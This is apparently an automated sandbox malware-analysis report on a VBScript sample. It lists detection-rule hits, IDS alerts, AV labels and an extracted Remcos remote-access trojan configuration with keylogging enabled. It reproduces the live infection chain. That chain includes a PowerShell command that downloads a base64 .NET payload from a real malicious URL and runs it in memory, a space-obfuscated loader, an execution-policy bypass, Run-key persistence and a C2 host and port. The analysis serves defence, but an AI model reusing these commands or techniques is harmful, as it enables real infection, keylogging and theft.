Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7604, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
                        Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7604, ProcessName: wscript.exe
                        Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6916, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 1396, ProcessName: powershell.exe
                        Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6916, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 6368, ProcessName: wscript.exe
                        Source: Process started, Author: frack113, Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6916, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 1396, ProcessName: powershell.exe
                        Source: Network Connection, Author: Florian Roth (Nextron Systems), Data: DestinationIp: 173.208.241.155, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                        Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                        Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Local\Temp\xx2.vbs
                        Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = '[space-obfuscated base64 payload omitted]';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = '[space-obfuscated base64 payload omitted]';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems), Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                        Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = '[space-obfuscated base64 payload omitted]';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6916, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 6368, ProcessName: wscript.exe
                        Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = '[space-obfuscated base64 payload omitted]';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = '[space-obfuscated base64 payload omitted]';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
                        Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Local\Temp\xx1.ps1

                        Stealing of Sensitive Information

                        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2124, TargetFilename: C:\ProgramData\remcos\logs.dat
                        Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
                        2024-09-26T10:55:11.388506+0200 | 2020423 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49732            | TCP
                        2024-09-26T10:55:31.026081+0200 | 2020423 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49743            | TCP
                        2024-09-26T10:55:38.866932+0200 | 2020423 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49746            | TCP

                        Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
                        2024-09-26T10:55:11.388506+0200 | 2020424 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49732            | TCP
                        2024-09-26T10:55:31.026081+0200 | 2020424 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49743            | TCP
                        2024-09-26T10:55:38.866932+0200 | 2020424 | 1        | Exploit Kit Activity Detected                 | 15.235.85.194 | 443         | 192.168.2.4     | 49746            | TCP

                        Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
                        2024-09-26T10:55:14.186081+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.4   | 49733       | 173.208.241.155 | 8888             | TCP

                        Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
                        2024-09-26T10:55:10.411734+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49731       | 15.235.85.194   | 443              | TCP
                        2024-09-26T10:55:11.212861+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49732       | 15.235.85.194   | 443              | TCP
                        2024-09-26T10:55:30.032957+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49742       | 15.235.85.194   | 443              | TCP
                        2024-09-26T10:55:30.849070+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49743       | 15.235.85.194   | 443              | TCP
                        2024-09-26T10:55:37.895610+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49745       | 15.235.85.194   | 443              | TCP
                        2024-09-26T10:55:38.692655+0200 | 2803305 | 3        | Unknown Traffic                               | 192.168.2.4   | 49746       | 15.235.85.194   | 443              | TCP

                        Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
                        2024-09-26T10:55:15.283452+0200 | 2803304 | 3        | Unknown Traffic                               | 192.168.2.4   | 49734       | 178.237.33.50   | 80               | TCP

                        AV Detection

                        Source: HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT, Avira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/, Avira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt, Avira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/07/r, Avira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt, Avira URL Cloud: Label: malware
                        Source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "special2023.duckdns.org:8888:1", "Assigned name": "Nlk", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3PWW8O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Source: sostener.vbs, ReversingLabs: Detection: 13%
                        Source: Yara match, File source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
